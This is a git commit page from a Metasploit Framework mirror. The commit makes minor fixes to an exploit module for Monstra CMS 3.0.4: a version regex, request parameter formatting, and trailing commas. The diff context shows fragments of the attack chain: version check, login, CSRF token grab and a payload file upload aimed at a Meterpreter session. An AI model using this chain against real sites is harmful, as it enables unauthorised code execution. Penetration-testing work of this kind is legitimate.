infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

modified regex, id=filesmanager lines

GSoC/Meterpreter_Web_Console
Shelby Pace 2018-07-09 10:55:29 -05:00
parent bc33078e01
commit 44b9798afb
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
1 changed files with 9 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
modules/exploits/multi/http/monstra_fileupload_exec.rb
View File

@ -69,11 +69,11 @@ class MetasploitModule < Msf::Exploit::Remote
return CheckCode::Unknown
end
if res.body =~ /<\/a> - Version (\d+\.\d+\.\d+)/i
if res.body =~ /<\/a>.*?Version (\d+\.\d+\.\d+)/i
version = Gem::Version.new($1)
vprint_status("Monstra CMS: #{version}")
if version == '3.0.4'
if version.to_s == '3.0.4'
return CheckCode::Vulnerable
else
return CheckCode::Safe
@ -95,8 +95,8 @@ class MetasploitModule < Msf::Exploit::Remote
'vars_post' => {
'login' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'login_submit' => 'Log+In',
},
'login_submit' => 'Log+In'
}
})
cookies = res.get_cookies
@ -106,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'admin' '/index.php'),
'cookie' => cookies,
'cookie' => cookies
})
fail_with(Failure::Unreachable, "#{peer} - Did not respond to Login request") if res.nil?
@ -134,9 +134,9 @@ class MetasploitModule < Msf::Exploit::Remote
# Request for CSRF token for file upload.
res = send_request_cgi({
'uri' => normalize_uri(uri, 'admin', '/index.php'),
'vars_get' => 'id=filesmanager',
'vars_get' => {'id' => 'filesmanager'},
'method' => 'GET',
'cookie' => cookies,
'cookie' => cookies
})
# Grabbing CSRF token from body
@ -155,12 +155,12 @@ class MetasploitModule < Msf::Exploit::Remote
# Lets Send Upload request.
res = send_request_cgi({
'uri' => normalize_uri(uri, 'admin', '/index.php'),
'vars_get' => 'id=filesmanager',
'vars_get' => {'id' => 'filesmanager'},
'method' => 'POST',
'cookie' => cookies,
'Connection' => 'close',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
# Cleanup delete payload after get meterpreter.